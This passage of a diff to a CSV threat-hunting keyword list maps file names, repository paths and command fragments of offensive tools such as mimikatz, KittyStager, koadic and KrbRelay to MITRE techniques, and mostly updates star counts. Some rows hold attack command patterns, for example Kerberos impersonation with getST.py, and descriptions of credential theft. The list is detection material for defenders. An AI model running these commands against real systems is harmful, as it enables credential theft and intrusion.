exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*kitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*kitten/basicKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*kitten_test.go*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*kittens/bananaKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*Kittielocal -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*KittyStager -*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager ?*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager ??*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager.git*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager/cmd*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager/internal*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*KittyStager/kitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*Kiwi Legit Printer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kitrap0d.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kitrap0d_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kitten/basicKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kitten_test.go*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kittens/bananaKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Kittielocal -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*KittyStager -*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager ?*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager ??*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager.git*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/cmd*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/internal*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/kitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Kiwi Legit Printer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*klezVirus/CheeseTools*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"*klezVirus/inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*klezVirus/inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*klezVirus/SilentMoonwalk*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*klsecservices*","offensive_tool_keyword","Github Username","exploitation tools for attackers","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/klsecservices","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*klsecservices/rpivot*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" -"*known_hosts2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*known_hosts2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Koadic.persist*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_load.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_net.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" @@ -12827,7 +12983,7 @@ "*Kraken Mask by @DallasFR*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" "*kraken.py --connect --mode * --profile * --compiler *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*KrakenMask-main*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" -"*krb2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*krb2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*krb5/kerberosv5.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*krb5decoder*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" @@ -12843,14 +12999,14 @@ "*KrbRelay*spoofing*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.csproj*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.exe*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" -"*KrbRelay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*KrbRelay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*KrbRelay.sln*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" -"*KrbRelayUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*krbrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","10","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"*krbrelayx.git*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*KrbRelayUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*krbrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation 